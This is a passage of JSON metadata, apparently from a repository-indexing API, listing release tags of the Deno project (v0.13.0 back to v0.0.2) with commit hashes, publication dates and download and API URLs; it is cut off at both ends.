fests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","publishe